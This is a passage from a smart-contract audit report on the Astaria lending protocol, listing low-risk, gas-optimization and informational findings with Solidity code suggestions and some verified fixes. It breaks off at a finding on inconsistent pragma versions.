+5.4.24 Manually constructed storage slots can be chosen so that the pre-image of the hash is unknown
Severity: Low Risk
Context:
• AstariaRouter.sol#L54-L55
• LienToken.sol#L46-L48
• CollateralToken.sol#L69-L70
• PublicVault.sol#L58-L59
• VaultImplementation.sol#L46-L47
• WithdrawProxy.sol#L48-L49
• Pausable.sol#L20-L21
• ERC20-Cloned.sol#L14
• ERC721.sol#L13-L14
Description: In the codebase, some storage slots are manually constructed using the keccak256 hash of a string xyz.astaria. .... The pre-images of these hashes are known. This could in the future allow actors to find a potential path to those storage slots using the keccak256 hash function in the codebase and some crafted payload.
Recommendation:
1. Subtract 1 from these hashes so that the pre-image would be unknown / less obvious.
2. Keep them as they are, without manually calculating the hash and inlining them, as the compiler does that for us off-chain.
So in general:

uint256 private constant NAMED_SLOT = uint256(keccak256("xyz.astaria.")) - 1;

And for
• WithdrawProxy.sol#L48-L49
• Pausable.sol#L20-L21
• ERC20-Cloned.sol#L14
• ERC721.sol#L13-L14
specifically, what should be used:

bytes32 constant NAMED_SLOT = bytes32(uint256(keccak256("xyz.astaria.")) - 1);

+5.4.25 Avoid shadowing variables
Severity: Low Risk
Context: LienToken.sol#L583
Description: The highlighted line declares a new variable owner, which has already been defined in Auth.sol, inherited by LienToken:

address owner = ownerOf(lienId);

Recommendation: Rename owner to lienOwner at LienToken.sol#L583.
Astaria: Fixed in PR 251.
Spearbit: Verified.

+5.4.26 PublicVault.accrue is manually inlined rather than called
Severity: Low Risk
Context: PublicVault.sol#L438-L448, PublicVault.sol#L611-L617
Description: The _accrue function locks in the implied value of the PublicVault by calculating, then adding to yIntercept, and finally emitting an event. This calculation is duplicated in 3 separate locations in PublicVault:
• In totalAssets
• In _accrue
• And in updateVaultAfterLiquidation
Recommendation: The calculation itself can be factored out into a view function:

function _totalAssets(VaultData storage s) internal view returns (uint256) {
  uint256 delta_t = block.timestamp - s.last;
  return uint256(s.slope).mulDivDown(delta_t, 1) + uint256(s.yIntercept);
}

Which can be reused in both totalAssets and accrue:

function totalAssets() public view virtual override(ERC4626Cloned) returns (uint256) {
  VaultData storage s = _loadStorageSlot();
- uint256 delta_t = block.timestamp - s.last;
- return uint256(s.slope).mulDivDown(delta_t, 1) + uint256(s.yIntercept);
+ return _totalAssets(s);
}

function _accrue(VaultData storage s) internal returns (uint256) {
  unchecked {
-   s.yIntercept += uint256(block.timestamp - s.last)
-     .mulDivDown(uint256(s.slope), 1)
-     .safeCastTo88();
+   s.yIntercept = (_totalAssets(s)).safeCastTo88();
    s.last = block.timestamp.safeCastTo40();
  }
  emit YInterceptChanged(s.yIntercept);
  return s.yIntercept;
}

And finally, accrue may be used in updateVaultAfterLiquidation so that emitting the event is not missed:

function updateVaultAfterLiquidation(
  uint256 maxAuctionWindow,
  AfterLiquidationParams calldata params
) public returns (address withdrawProxyIfNearBoundary) {
  require(msg.sender == address(LIEN_TOKEN())); // can only be called by router
  VaultData storage s = _loadStorageSlot();
  unchecked {
-   s.yIntercept += uint256(s.slope)
-     .mulDivDown(block.timestamp - s.last, 1)
-     .safeCastTo88();
+   _accrue(s);
    s.slope -= params.lienSlope.safeCastTo48();
-   s.last = block.timestamp.safeCastTo40();
  }
  ...snip...
}

+5.4.27 CollateralToken.flashAction reverts with incorrect error
Severity: Low Risk
Context: CollateralToken.sol#L272
Description: Reverts with InvalidCollateralStates.AUCTION_ACTIVE when the address is not flashEnabled.
Recommendation: Revert using InvalidCollateralStates.FLASH_DISABLED:

function flashAction(
  IFlashAction receiver,
  uint256 collateralId,
  bytes calldata data
) external onlyOwner(collateralId) {
  ...snip...
  if (!s.flashEnabled[addr]) {
-   revert InvalidCollateralState(InvalidCollateralStates.AUCTION_ACTIVE);
+   revert InvalidCollateralState(InvalidCollateralStates.FLASH_DISABLED);
  }
  ...snip...
}

+5.4.28 AstariaRouter has unnecessary access to setPayee
Severity: Low Risk
Context: LienToken.sol#L872
Description: setPayee is never called from AstariaRouter, but the router has access to call LienToken.setPayee.
Recommendation: Remove unneeded access:

function setPayee(Lien calldata lien, address newPayee) public {
  ...snip...
  require(
-   msg.sender == ownerOf(lienId) || msg.sender == address(s.ASTARIA_ROUTER)
+   msg.sender == ownerOf(lienId)
  );
  ...snip...
}

5.5 Gas Optimization

+5.5.1 ClearingHouse can be deployed only when needed
Severity: Gas Optimization
Context: CollateralToken.sol#L632-640
Description: When collateral is deposited, a Clearing House is automatically deployed. However, these Clearing Houses are only needed if the collateral goes to auction at Seaport, either through liquidation or the collateral holder choosing to sell them. The Astaria team has indicated that this behavior is intentional in order to put the cost on the borrower, since liquidations are already expensive. I'd suggest the perspective that all pieces of collateral will be added to the system, but a much smaller percentage will ever be sent to Seaport. The aggregate gas spent will be much, much lower if we are careful to only deploy these contracts as needed. Further, let's look at the two situations where we may need a Clearing House:
1) The collateral holder calls listForSaleOnSeaport(): in this case, the borrower is paying anyways, so it's a no-brainer.
2) Another user calls liquidate(): in this case, they will earn the liquidation fees, which should be sufficient to justify a small increase in gas costs.
Recommendation: Move the creation of the Clearing House to liquidate() and listForSaleOnSeaport(), and remove it from onERC721Received().

+5.5.2 PublicVault.claim() can be optimized
Severity: Gas Optimization
Context:
• PublicVault.sol#L479
• PublicVault.sol#L483
Description: For claim not to revert we would need to have msg.sender == owner(). And so when the following is called:

_mint(owner(), unclaimed);

instead of owner() we can use msg.sender, since reading the immutable owner() requires some calldata lookup.
Recommendation: Use msg.sender instead of owner() when minting in claim():

_mint(msg.sender, unclaimed);

+5.5.3 Can remove incoming terms from LienActionBuyout struct
Severity: Gas Optimization
Context: ILienToken.sol#L88
Description: Incoming terms are never used in the LienActionBuyout struct. The general flow right now is:
• incomingTerms are passed to VaultImplementation#buyoutLien.
• These incoming terms are validated and used to generate the lien information.
• The lien information is encoded into a LienActionBuyout struct.
• This is passed to LienToken#buyoutLien, but then the incoming terms are never used again.
Recommendation: Pass the incomingTerms to VaultImplementation#buyoutLien, validate them, use them to generate the lien information, and then pass that to LienToken#buyoutLien without the incoming terms. This will allow you to edit the LienActionBuyout struct to:

struct LienActionBuyout {
- IAstariaRouter.Commitment incoming;
  uint8 position;
  LienActionEncumber encumber;
}

Astaria: The following commit fixes this issue: commit 9dcfc4.
Spearbit: Verified.

+5.5.4 Refactor updateVaultAfterLiquidation to save gas
Severity: Gas Optimization
Context: PublicVault.sol#L604-637
Description: In updateVaultAfterLiquidation, we check if we're within maxAuctionWindow of the end of the epoch. If we are, we call _deployWithdrawProxyIfNotDeployed and assign withdrawProxyIfNearBoundary to the result. We then proceed to check if withdrawProxyIfNearBoundary is assigned and, if it is, call handleNewLiquidation. Instead of checking separately, we can include this call within the block of code executed if we're within maxAuctionWindow of the end of the epoch. This is true because (a) the withdraw proxy will always be deployed by the end of that block and (b) the withdraw proxy will never be deployed if timeToEnd >= maxAuctionWindow.
Recommendation:

uint256 timeToEnd = timeToEpochEnd(lienEpoch);
if (timeToEnd < maxAuctionWindow) {
  _deployWithdrawProxyIfNotDeployed(s, lienEpoch);
  withdrawProxyIfNearBoundary = s.epochData[lienEpoch].withdrawProxy;
- }
- if (withdrawProxyIfNearBoundary != address(0)) {
  WithdrawProxy(withdrawProxyIfNearBoundary).handleNewLiquidation(
    params.newAmount,
    maxAuctionWindow
  );
}

Astaria: commit 1a64b3.
Spearbit: Verified.

+5.5.5 Use collateralId to set collateralIdToAuction mapping
Severity: Gas Optimization
Context: CollateralToken.sol#L595
Description: _listUnderlyingOnSeaport() sets the collateralIdToAuction mapping as follows:

s.collateralIdToAuction[uint256(listingOrder.parameters.zoneHash)] = true;

Since this function has access to collateralId, it can be used instead of zoneHash.
Recommendation: Consider using collateralId to set collateralIdToAuction:

s.collateralIdToAuction[collateralId] = true;

Astaria: Fixed in commit 8fc32b.
Spearbit: Verified.

+5.5.6 Storage packing
Severity: Gas Optimization
Context:
• IAstariaRouter.RouterStorage
• ILienToken.LienStorage
• IPublicVault.VaultData
Description:
RouterStorage: The RouterStorage struct represents state managed in storage by the AstariaRouter contract. Some of the packing in this struct is suboptimal.
1. maxInterestRate and minInterestBPS: these two values pack into a single storage slot; however, they are never referenced together outside of the constructor. This means that, when read from storage, there are no gas efficiencies gained.
2. Comments denoting storage slots do not match the implementation. The comment //slot 3 +, for example, occurs far after the 3rd slot begins, as the addresses do not pack together.
LienStorage:
3. The LienStorage struct packs maxLiens with the WETH address into a single storage slot. While gas is saved on the constructor, extra gas is spent in parsing maxLiens on each read, as it is read alone.
VaultData:
4. VaultData packs currentEpoch into the struct's first slot; however, it is more commonly read along with values from the struct's second slot.
Recommendation: Note, some recommendations incur a greater one-time gas cost on write to net a lower cost on reads.
1. Pack minInterestBPS and minDurationIncrease together, as they are both read in AstariaRouter.isValidRefinance.
1b. Consider packing maxInterestRate with one of the addresses (COLLATERAL_TOKEN or WETH). This means both may be read in a single sload in _validateCommitment; however, it does incur a smaller increase in gas when the stored address is referenced in other functions.
2. Update or remove the comments. If packing, updating is preferred.
3. Give maxLiens a type of uint256.
4. Consider moving currentEpoch to the second storage slot.

+5.5.7 ClearingHouse fallback can save WETH address to memory to save gas
Severity: Gas Optimization
Context: ClearingHouse.sol#L21-34
Description: The fallback function reads WETH() from ROUTER three times.
Recommendation: It would save gas to read the value once and save it to memory for the subsequent calls:

fallback() external payable {
  IAstariaRouter ASTARIA_ROUTER = IAstariaRouter(_getArgAddress(0));
  require(msg.sender == address(ASTARIA_ROUTER.COLLATERAL_TOKEN().SEAPORT()));
+ WETH weth = WETH(payable(address(ASTARIA_ROUTER.WETH())));
- WETH(payable(address(ASTARIA_ROUTER.WETH()))).deposit{value: msg.value}();
+ weth.deposit{value: msg.value}();
- uint256 payment = ASTARIA_ROUTER.WETH().balanceOf(address(this));
+ uint256 payment = weth.balanceOf(address(this));
- ASTARIA_ROUTER.WETH().safeApprove(
+ weth.safeApprove(
    address(ASTARIA_ROUTER.TRANSFER_PROXY()),
    payment
  );
  ...

+5.5.8 CollateralToken's onlyOwner modifier doesn't need to access storage
Severity: Gas Optimization
Context: CollateralToken.sol#254-259
Description: The onlyOwner modifier calls ownerOf(), which loads storage itself to check ownership. We can save a storage load, since we don't need to load the storage variables in the modifier itself.
Recommendation:

modifier onlyOwner(uint256 collateralId) {
- CollateralStorage storage s = _loadCollateralSlot();
  require(ownerOf(collateralId) == msg.sender);
  _;
}

Astaria: Fixed in commit a52a05.
Spearbit: Verified.

+5.5.9 Can stop loop early in _payDebt when everything is spent
Severity: Gas Optimization
Context: LienToken.sol#L480-488
Description: When a loan is sold on Seaport and _payDebt is called, it loops through the auction stack and calls _paymentAH for each, decrementing the remaining payment as money is spent. This loop can be ended when payment == 0.
Recommendation:

for (uint256 i = 0; i < stack.length; i++) {
+ if (payment == 0) break;
  uint256 spent;
  unchecked {
    spent = _paymentAH(s, collateralId, stack, i, payment, payer);
    totalSpent += spent;
    payment -= spent;
  }
}

Astaria: Fixed in commit 795c0c.
Spearbit: Verified.

+5.5.10 Can remove initializing allowList and depositCap for private vaults
Severity: Gas Optimization
Context: AstariaRouter.sol#L653-660
Description: Private Vaults do not allow enabling, disabling, or editing the allow list, and don't enforce a deposit cap, so it seems strange to initialize these variables. Delegates are still included in the _validateCommitment function, so we can't get rid of this entirely.
Recommendation: Change the init function in the underlying vault to only set the delegate. Move the allowList and depositCap setup to a separate function that lives in PublicVault.sol, and is called separately in the event that a public vault is being created.

+5.5.11 ISecurityHook.getState can be modified to return bytes32 / hash of the state instead of the state itself
Severity: Gas Optimization
Context: CollateralToken.sol#L304-L308
Description / Recommendation: Since only the keccak256 of preTransferState is checked against the keccak256 hash of the returned security hook state, we could change the design so that ISecurityHook.getState returns bytes32 to save gas, unless there is a plan to use the bytes memory preTransferState in some other form as well.

+5.5.12 Define an endpoint for LienToken that only returns the liquidator
Severity: Gas Optimization
Context: CollateralToken.sol#L113
Description: It would save a lot of gas if LienToken had an endpoint that would only return the liquidator for a collateralId, instead of all the auction data.
Recommendation: An endpoint like the following can be defined for LienToken:

function getAuctionLiquidator(uint256 collateralId) external view returns (address liquidator) {
  return _loadLienStorageSlot().auctionData[collateralId].liquidator;
}

getAuctionLiquidator can perhaps revert if liquidator is address(0). Also, note that getAuctionLiquidator is more useful than getAuctionData, since, if the above is implemented, getAuctionData would potentially only be used for off-chain purposes.

+5.5.13 Setting uninitialized stack variables to their default value can be avoided
Severity: Gas Optimization
Context: LienToken.sol#L687
Description: Setting uninitialized stack variables to their default value adds extra gas overhead:

T t = <default value of T>;

Recommendation: The assignment of the default value right after the declaration of the variable can be removed, unless it is there for better readability (but that can also be included as a comment):

T t;

+5.5.14 Simplify / optimize for loops
Severity: Gas Optimization
Context:
• LienToken.sol#L688-L690
• LienToken.sol#L816-L822
• AstariaRouter.sol#L191-L193
• AstariaRouter.sol#L272-L290
• AstariaRouter.sol#L405-L413
• CollateralToken.sol#L182-L184
• LienToken.sol#L258-L290
• LienToken.sol#L480-L487
• VaultImplementation.sol#L189-L191
Description: In the codebase, there are sometimes for loops of the form:

for (uint256 i = 0; i < n; i++) {
  ...
}

These for loops can be optimized.
Recommendation: Transform the for loops mentioned into the following form:

uint256 i;
for (; i < n; ) {
  ...
  unchecked {
    ++i;
  }
}

+5.5.15 calculateSlope can be more simplified
Severity: Gas Optimization
Context: LienToken.sol#L649-L656
Description: calculateSlope can be simplified further. owedAtEnd would be:

owedAtEnd = amt + (t_end - t_last) * r * amt / 10^18

where:
• amt is stack.point.amount
• t_end is stack.point.end
• t_last is stack.point.last
• r is stack.lien.details.rate
and so the returned value (the slope) would need to be r * amt / 10^18.
Recommendation: The simplified version of calculateSlope would be:

function calculateSlope(Stack memory stack) public pure returns (uint256) {
  return stack.lien.details.rate.mulWadDown(
    stack.point.amount
  );
}

+5.5.16 Break out of _makePayment for loop early when totalCapitalAvailable reaches 0
Severity: Gas Optimization
Context: LienToken.sol#L629
Description: In _makePayment we have the following for loop:

for (uint256 i; i < n; ) {
  (newStack, spent) = _payment(
    s,
    stack,
    uint8(i),
    totalCapitalAvailable,
    address(msg.sender)
  );
  totalCapitalAvailable -= spent;
  unchecked {
    ++i;
  }
}

When totalCapitalAvailable reaches 0 we still call _payment, which costs a lot of gas and only ends up transferring 0 assets, removing and re-adding the same slope for a lien owner if it is a public vault, and performing other no-ops.
Recommendation: Break out of the for loop when totalCapitalAvailable == 0, as sketched below.
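A minimal diff-style sketch of the early exit (assuming no other bookkeeping relies on visiting every stack element):

for (uint256 i; i < n; ) {
+ if (totalCapitalAvailable == 0) break;
  (newStack, spent) = _payment(
    s,
    stack,
    uint8(i),
    totalCapitalAvailable,
    address(msg.sender)
  );
  totalCapitalAvailable -= spent;
  unchecked {
    ++i;
  }
}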
+5.5.17 _buyoutLien can be optimized by reusing payee
Severity: Gas Optimization
Context: LienToken.sol#L154-L164
Description: payee in _buyoutLien can be reused to save some gas.
Recommendation: Define payee earlier in the _buyoutLien body and use this stack variable to avoid unnecessary computation:

address payee = _getPayee(
  s,
  params.encumber.stack[params.position].point.lienId
);
s.TRANSFER_PROXY.tokenTransferFrom(
  s.WETH,
  address(msg.sender),
  payee, // <--- replaced value
  buyout
);

+5.5.18 isValidRefinance and related storage parameters can be moved to LienToken
Severity: Gas Optimization
Context:
• LienToken.sol#L123-L127
• AstariaRouter.sol#L593
• IAstariaRouter.sol#L74
• IAstariaRouter.sol#L81
Description: isValidRefinance is only used in LienToken, and with the current implementation it requires reading AstariaRouter from storage and performing a cross-contract call, which adds a lot of gas overhead.
Recommendation: We can move the isValidRefinance function from AstariaRouter to LienToken. This would remove the need to first read ASTARIA_ROUTER from storage and then call an external contract. It would also simplify the codebase. This would also mean defining the storage variables minInterestBPS and minDurationIncrease here instead of in AstariaRouter. Note that both of these variables are used only in isValidRefinance, besides when filing to update them.
Astaria: We did this in an effort to concentrate protocol values into the same contract / space.

+5.5.19 auctionWindowMax can be reused to optimize liquidate
Severity: Gas Optimization
Context: AstariaRouter.sol#L541
Description: There are multiple instances of s.auctionWindow + s.auctionWindowBuffer in the liquidate function, each of which makes the function read from storage twice. Also, there is already a stack variable auctionWindowMax defined as this sum, which can be reused.
Recommendation: Reuse auctionWindowMax for the other instances of s.auctionWindow + s.auctionWindowBuffer:

listedOrder = s.COLLATERAL_TOKEN.auctionVault(
  ICollateralToken.AuctionVaultParams({
    settlementToken: address(s.WETH),
    collateralId: stack[position].lien.collateralId,
-   maxDuration: uint256(s.auctionWindow + s.auctionWindowBuffer),
+   maxDuration: auctionWindowMax,
    startingPrice: stack[0].lien.details.liquidationInitialAsk,
    endingPrice: 1_000 wei
  })
);

+5.5.20 fileBatch() does requiresAuth for each file separately
Severity: Gas Optimization
Context: CollateralToken.sol#L181-L191
Description: fileBatch() does a requiresAuth check and then, for each element in the input array, calls file(), which does another requiresAuth check.

function fileBatch(File[] calldata files) external requiresAuth {
  for (uint256 i = 0; i < files.length; i++) {
    file(files[i]);
  }
}
...
function file(File calldata incoming) public requiresAuth {

This wastes gas: if fileBatch()'s requiresAuth check passes, file()'s check will pass too.
Recommendation: Create an internal function _file() without the check. Update fileBatch() and file() to call _file().
Astaria: Fixed in PR 1931.
Spearbit: Verified.

+5.5.21 _sliceUint can be optimized
Severity: Gas Optimization
Context: AstariaRouter.sol#L315
Description: _sliceUint can be optimized.
Recommendation: It is cheaper to use a named return parameter, cache the calculation of the end offset, and use custom errors:

uint256 private constant OUTOFBOUND_ERROR_SELECTOR =
  0x571e08d100000000000000000000000000000000000000000000000000000000; // cast --to-bytes32 $(cast sig "OutOfBoundError()")
uint256 private constant ONE_WORD = 0x20;
...

function _sliceUint(bytes memory bs, uint256 start) internal pure returns (uint256 x) {
  uint256 length = bs.length;
  assembly {
    let end := add(ONE_WORD, start)
    if lt(length, end) {
      mstore(0, OUTOFBOUND_ERROR_SELECTOR)
      revert(0, ONE_WORD)
    }
    x := mload(add(bs, end))
  }
}

Also add unit/differential tests for this function.

+5.5.22 Use basis points for ratios
Severity: Gas Optimization
Context: IAstariaRouter.sol#L61, IAstariaRouter.sol#L65, IAstariaRouter.sol#L78-L79
Description: Fee ratios are represented through two state variables for numerator and denominator. A basis point system can be used in their place, as it is simpler (the denominator is always 10_000) and gas efficient, since the denominator is then a constant.
Recommendation: Use a basis point system to represent ratios. Remove the denominator state variables and use 10_000 as a constant variable in their place.

+5.5.23 No Need to Allocate Unused Variable
Severity: Gas Optimization
Context:
• LienToken.sol#L619-L622
• LienToken.sol#L553
• VaultImplementation.sol#L315
Description: LienToken._makePayment() returns two values: (Stack[] memory newStack, uint256 spent), but the second value is never read:

(newStack, ) = _makePayment(_loadLienStorageSlot(), stack, amount);

Also, if this value is planned to be used in the future, it is not a useful value: it is equal to the payment made to the last lien. A more meaningful quantity would be the total payment made to the entire stack. Additional instances are noted in Context above.
Recommendation: Only return newStack from _makePayment().

+5.5.24 Cache Values to Save Gas
Severity: Gas Optimization
Context:
1. CollateralToken.sol#L286-L307
2. VaultImplementation.sol#L329 (ROUTER().LIEN_TOKEN())
3. LienToken.sol#L511-L512
4. AstariaRouter.sol#L345
5. PublicVault.sol#L380
Description: Calls occur, the same values are computed, or storage variables are read, multiple times; e.g. CollateralToken.sol#L286-L307 reads the storage variable s.securityHooks[addr] four times. It's better to cache the result in a stack variable to save gas.
Recommendation:
1. Cache s.securityHooks[addr] in a stack variable and replace all the current usages of s.securityHooks[addr] with this new variable;
2. Cache ROUTER().LIEN_TOKEN() and reuse the value;
3. Compute lienId one time only;
4. Cache s.strategyValidators[nlrType] and reuse the value;
5. Make use of the existing currentWithdrawProxy variable (requires this recommendation to be adopted first).
Depending on the optimizer settings used, the optimizer itself can eliminate the duplicate sloads.

+5.5.25 RouterStorage.vaults can be a boolean mapping
Severity: Gas Optimization
Context: AstariaRouter.sol#L662, AstariaRouter.sol#L295, AstariaRouter.sol#L590, IAstariaRouter.sol#L85
Description: RouterStorage.vaults is of type mapping(address => address). A key-value pair is stored in the mapping as:

s.vaults[vaultAddr] = msg.sender;

However, values in this mapping are only used to compare against address(0):

if (_loadRouterSlot().vaults[msg.sender] == address(0)) {
...
return _loadRouterSlot().vaults[vault] != address(0);

It's better to have vaults as a boolean mapping, as the assignment of msg.sender as the value doesn't carry a special meaning.
Recommendation: To save gas, make RouterStorage.vaults of type mapping(address => bool).
Assign it as:

- s.vaults[vaultAddr] = msg.sender;
+ s.vaults[vaultAddr] = true;

Instead of comparing it against address(0), check if the value is true:

- if (_loadRouterSlot().vaults[msg.sender] == address(0)) {
+ if (!_loadRouterSlot().vaults[msg.sender]) {
...
- return _loadRouterSlot().vaults[vault] != address(0);
+ return _loadRouterSlot().vaults[vault];

Astaria: Fixed in commit 2f5856.
Spearbit: Verified.

+5.5.26 isValidRefinance() should just take an array element as input
Severity: Gas Optimization
Context: AstariaRouter.sol#L596-L602
Description: isValidRefinance() takes the stack array as an argument but only uses stack[0] and stack[position]:

function isValidRefinance(
  ILienToken.Lien calldata newLien,
  uint8 position,
  ILienToken.Stack[] calldata stack
) public view returns (bool) {

The usage of stack[0] can be replaced with stack[position], as stack[0].lien.collateralId == stack[position].lien.collateralId:

if (newLien.collateralId != stack[0].lien.collateralId) {
  revert InvalidRefinanceCollateral(newLien.collateralId);
}

To save gas, it can directly take that one element as input.
Recommendation:
• Update the function to take stack[position] as input:

function isValidRefinance(
  ILienToken.Lien calldata newLien,
  ILienToken.Stack calldata stack // notice the type change of `stack`
) public view returns (bool) {

• Replace all usages of stack[position] and stack[0] with stack.
• Replace all calls to isValidRefinance() to use the new function signature.
Astaria: Acknowledged. Will be automatically fixed through the issue: "isValidRefinance and related storage parameters can be moved to LienToken".

+5.5.27 Functions can be made external
Severity: Gas Optimization
Context:
• WithdrawProxy.sol#L211
• PublicVault.sol#L486
• VaultImplementation.sol#L42-L44
• VaultImplementation.sol#L66
Description: If a public function is not called from within the contract, it should be made external for clarity, and this can potentially save gas.
Recommendation: Convert all highlighted functions to external.
Astaria: Fixed in commit cfa6e0.
Spearbit: Verified.

+5.5.28 Store bytes known at compile time as constant variables
Severity: Gas Optimization
Context: LienToken.sol#L134, LienToken.sol#L291, LienToken.sol#L369, VaultImplementation.sol#L140-L143
Description: Context points to several instances which can be converted into constant variables, for instance bytes32("ACTIVE_AUCTION") and keccak256("0"). This is less error-prone and saves gas, as keccak's value will be inlined by the compiler.
Recommendation: Convert all highlighted code to constant variables.
Astaria: Verified in commit 655728.
Spearbit: Verified.

+5.5.29 a.mulDivDown(b,1) is equivalent to a*b
Severity: Gas Optimization
Context: LienToken.sol#L220, LienToken.sol#L733
Description: The highlighted code above follows the pattern a.mulDivDown(b, 1), which is equivalent to a*b.
Recommendation: Replace all instances of a.mulDivDown(b, 1) with a*b to save gas.
Astaria: Fixed in commits f56f41 and 5af9c8.
Spearbit: Verified.

+5.5.30 Use scratch space for keccak
Severity: Gas Optimization
Context: CollateralLookup.sol#L21
Description: The computeId() function computes and returns uint256(keccak256(abi.encodePacked(token, tokenId))). Since the data being hashed fits within 2 memory slots, scratch space can be used to avoid paying gas costs on memory expansion.
Recommendation: Consider rewriting the computeId() function as:

function computeId(address token, uint256 tokenId) internal pure returns (uint256 hash) {
  assembly {
    mstore(0, token) // sets the right-most 20 bytes in the first memory slot.
    mstore(0x20, tokenId) // stores tokenId in the second memory slot.
    hash := keccak256(12, 52) // keccak from the 12th byte up to the entire second memory slot.
  }
}

Astaria: Fixed in commit 47e7a6.
Spearbit: Verified.

5.6 Informational

+5.6.1 Define a named constant for the return value of onFlashAction
Severity: Informational
Context: ClaimFees.sol#L38
Description: onFlashAction returns:

keccak256("FlashAction.onFlashAction")

Recommendation: This value can be turned into a named constant:

bytes32 private constant FLASH_ACTION_MAGIC =
  keccak256("FlashAction.onFlashAction");

The constant value can be used as the return value instead.

+5.6.2 Define a named constant for permit typehash in ERC20-Cloned
Severity: Informational
Context: ERC20-Cloned.sol#L121-L123
Description: In permit, the following type hash has been used:

keccak256(
  "Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)"
)

Recommendation: It would be best to define a named constant for the hash above and replace its usage with the named constant:

bytes32 private constant PERMIT_TYPEHASH =
  keccak256(
    "Permit(address owner,address spender,uint256 value,uint256 nonce,uint256 deadline)"
  );

+5.6.3 Unused struct, enum and storage fields can be removed
Severity: Informational
Context:
• IAstariaRouter.sol#L38
• IAstariaRouter.sol#L41
• ICollateralToken.sol#L67
• ILienToken.sol#L22
• ICollateralToken.sol#L49
• ICollateralToken.sol#L42
Description: The struct, enum and storage fields in this context are not used in the project.
Recommendation: If there is no plan to use these fields, it would be best to remove them to simplify/clean the codebase.

+5.6.4 WPStorage.expected's comment can be made more accurate
Severity: Informational
Context: WithdrawProxy.sol#L53
Description: In WPStorage's definition we have:

uint88 expected; // Expected value of auctioned NFTs. yIntercept (virtual assets) of a PublicVault are not modified on liquidation, only once an auction is completed.

The comment for expected is not exactly accurate. The accumulated value in expected is the sum of all auctioned NFTs' amountOwed at the timestamp the liquidate function gets called, whereas the NFTs get auctioned starting from their first stack element's liquidationInitialAsk down to 1_000 wei.
Recommendation: The comment for expected can be modified to emphasize that: the accumulated value in expected is the sum of all auctioned NFTs' amountOwed at the timestamp the liquidate function gets called.

+5.6.5 Leave comment that in WithdrawProxy.claim() the calculation of balance cannot underflow
Severity: Informational
Context: WithdrawProxy.sol#L235-L236
Description: There is the following line in claim() where balance is initialised:

uint256 balance = ERC20(asset()).balanceOf(address(this)) - s.withdrawReserveReceived;

With the current PublicVault implementation of IPublicVault, this cannot underflow, since the increase in withdrawReserveReceived (using increaseWithdrawReserveReceived) is synced with increasing the asset balance by the same amount.
Recommendation: The claim in the description needs to be double-checked. But the general recommendation is to leave a comment/explanation as in the description.
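A minimal sketch of such a comment (assuming the PublicVault invariant described above holds):

// Cannot underflow: `withdrawReserveReceived` is only increased via
// `increaseWithdrawReserveReceived`, which the PublicVault calls in the same
// operation that transfers the matching amount of assets to this proxy.
uint256 balance = ERC20(asset()).balanceOf(address(this)) -
  s.withdrawReserveReceived;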
+5.6.6 Shared logic in withdraw and redeem functions of WithdrawProxy can be turned into a shared modifier
Severity: Informational
Context:
• WithdrawProxy.sol#L146-L152
• WithdrawProxy.sol#L169-L175
Description: withdraw and redeem both start with the following lines:

WPStorage storage s = _loadSlot();
// If auction funds have been collected to the WithdrawProxy
// but the PublicVault hasn't claimed its share, too much money will be sent to LPs
if (s.finalAuctionEnd != 0) {
  // if finalAuctionEnd is 0, no auctions were added
  revert InvalidState(InvalidStates.NOT_CLAIMED);
}

Since they share this logic at the beginning of their bodies, we can consolidate the logic into a modifier.
Recommendation: Refactor the shared logic into a modifier that can be used by both functions:

modifier onlyWhenNoActiveAuction() {
  WPStorage storage s = _loadSlot();
  // If auction funds have been collected to the WithdrawProxy
  // but the PublicVault hasn't claimed its share, too much money will be sent to LPs
  if (s.finalAuctionEnd != 0) {
    // if finalAuctionEnd is 0, no auctions were added
    revert InvalidState(InvalidStates.NOT_CLAIMED);
  }
  _;
}

+5.6.7 StrategyDetails version can only be used in custom implementations of IStrategyValidator, requires documentation
Severity: Informational
Context: IAstariaRouter.sol#L103
Description: StrategyDetails.version is never used in the current implementations of the validators.
• If the intention is to avoid replays across different versions of Astaria, we should add a check for it in the commitment validation functions.
• A custom implementation of IStrategyValidator can make use of this value, but this needs documentation as to exactly what it refers to.
Recommendation: Include documentation on how StrategyDetails.version will be used, and add a check to the validators if needed.

+5.6.8 Define helper functions to tag different pieces of cloned data for ClearingHouse
Severity: Informational
Context:
• ClearingHouse.sol#L22
• ClearingHouse.sol#L31
Description: _getArgAddress(0) and _getArgUint256(21) are used as the ROUTER() and COLLATERAL_ID() in the fallback implementation for ClearingHouse, which is a Clone-derived contract.
Recommendation: It would be best to define endpoints for these different parameters to tag the pieces of cloned data, like other similar Clone contracts in the project.
So we can define:

function ROUTER() public pure returns (IAstariaRouter) {
  return IAstariaRouter(_getArgAddress(0));
}

function COLLATERAL_ID() public pure returns (uint256) {
  return _getArgUint256(21);
}

and (to be consistent with other cloned contracts)

function IMPL_TYPE() public pure returns (uint8) {
  return _getArgUint8(20);
}

and the fallback can be changed to:

fallback() external payable {
  IAstariaRouter ASTARIA_ROUTER = IAstariaRouter(ROUTER());
  require(msg.sender == address(ASTARIA_ROUTER.COLLATERAL_TOKEN().SEAPORT()));
  WETH(payable(address(ASTARIA_ROUTER.WETH()))).deposit{value: msg.value}();
  uint256 payment = ASTARIA_ROUTER.WETH().balanceOf(address(this));
  ASTARIA_ROUTER.WETH().safeApprove(
    address(ASTARIA_ROUTER.TRANSFER_PROXY()),
    payment
  );
  ASTARIA_ROUTER.LIEN_TOKEN().payDebtViaClearingHouse(
    COLLATERAL_ID(),
    payment
  );
}

+5.6.9 A new modifier onlyVault() can be defined for WithdrawProxy to consolidate logic
Severity: Informational
Context:
• WithdrawProxy.sol#L212
• WithdrawProxy.sol#L271
• WithdrawProxy.sol#L281
• WithdrawProxy.sol#L291
Description: The following require statement has been used in multiple functions, including increaseWithdrawReserveReceived, drain, setWithdrawRatio and handleNewLiquidation:

require(msg.sender == VAULT(), "only vault can call");

Recommendation: We can transform the require statement into a modifier and use the modifier instead for the functions in this context:

modifier onlyVault() {
  require(msg.sender == VAULT(), "only vault can call");
  _;
}

+5.6.10 Inconsistent pragma versions and floating pragma versions can be avoided
Severity: Informational
Context:
Description: Most contracts in the project use pragma solidity ^0.8.17, but there are other variants as well:
